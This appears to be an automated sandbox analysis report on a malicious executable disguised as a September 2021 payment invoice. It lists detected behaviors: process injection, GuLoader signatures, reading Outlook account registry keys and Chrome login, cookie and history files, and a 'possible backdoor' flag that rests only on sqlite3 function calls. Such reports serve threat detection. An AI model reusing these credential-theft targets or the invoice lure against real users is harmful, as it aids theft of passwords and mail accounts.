Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6EA4E1FC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 24_2_6EA4E1FC

HIPS / PFW / Operating System Protection Evasion:

Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Process created: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe 'C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

GuLoader behavior detected
Source: Initial file Signature Results: GuLoader behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E96568F sqlite3_bind_value,sqlite3_bind_null,_mbstowcs_s,sqlite3_bind_double,sqlite3_bind_int64, 24_2_6E96568F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97BEDB memset,sqlite3_malloc,memset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_reset, 24_2_6E97BEDB
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97C7DE sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 24_2_6E97C7DE
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97BFCD sqlite3_bind_int64,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,memcpy,sqlite3_reset, 24_2_6E97BFCD
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E99D716 sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset, 24_2_6E99D716
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97EF06 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,sqlite3_step,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_bind_int,sqlite3_column_int,sqlite3_bind_int,sqlite3_column_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset, 24_2_6E97EF06
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E981F5A sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_column_bytes,sqlite3_column_blob,memset,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free, 24_2_6E981F5A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E977F47 sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset, 24_2_6E977F47
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E978F41 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_reset, 24_2_6E978F41
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E99AF7F sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64, 24_2_6E99AF7F
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9804E6 sqlite3_bind_int64,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,sqlite3_bind_int64,sqlite3_step,sqlite3_column_type,sqlite3_reset, 24_2_6E9804E6
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97D40A sqlite3_malloc,sqlite3_free,sqlite3_bind_int64,sqlite3_free,sqlite3_step,sqlite3_reset, 24_2_6E97D40A
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E99CDFE sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset, 24_2_6E99CDFE
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E978DE4 sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 24_2_6E978DE4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E978D1C sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 24_2_6E978D1C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E98057B sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset, 24_2_6E98057B
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9822B7 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 24_2_6E9822B7
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9812CE sqlite3_mprintf,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_parameter_count,sqlite3_bind_value, 24_2_6E9812CE
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97D2F1 sqlite3_bind_int,sqlite3_bind_value,sqlite3_step,sqlite3_reset, 24_2_6E97D2F1
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965A0C sqlite3_bind_parameter_index, 24_2_6E965A0C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965A28 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave, 24_2_6E965A28
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E96525E sqlite3_bind_int,sqlite3_bind_int64, 24_2_6E96525E
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965277 sqlite3_bind_int64,sqlite3_mutex_leave, 24_2_6E965277
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9653F8 sqlite3_bind_text16, 24_2_6E9653F8
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E966306 sqlite3_value_text,sqlite3_mprintf,sqlite3_mprintf,sqlite3_free,sqlite3_bind_value, 24_2_6E966306
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965302 sqlite3_bind_null,sqlite3_mutex_leave, 24_2_6E965302
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E98230D sqlite3_bind_null,sqlite3_step,sqlite3_reset, 24_2_6E98230D
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965353 sqlite3_bind_text, 24_2_6E965353
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E97C0C3 sqlite3_bind_int64,sqlite3_step,sqlite3_reset, 24_2_6E97C0C3
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E965054 sqlite3_bind_blob, 24_2_6E965054
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E96599C sqlite3_bind_parameter_name, 24_2_6E96599C
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9651EC sqlite3_bind_double,sqlite3_mutex_leave, 24_2_6E9651EC
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E9821E4 sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_mprintf,sqlite3_free,sqlite3_step,sqlite3_reset, 24_2_6E9821E4
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E978947 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_result_error_code, 24_2_6E978947
Source: C:\Users\user\Desktop\usd15.030 payment copy & signed invoice SEPTEMBER 2021 shipment.exe Code function: 24_2_6E96597F sqlite3_bind_parameter_count, 24_2_6E96597F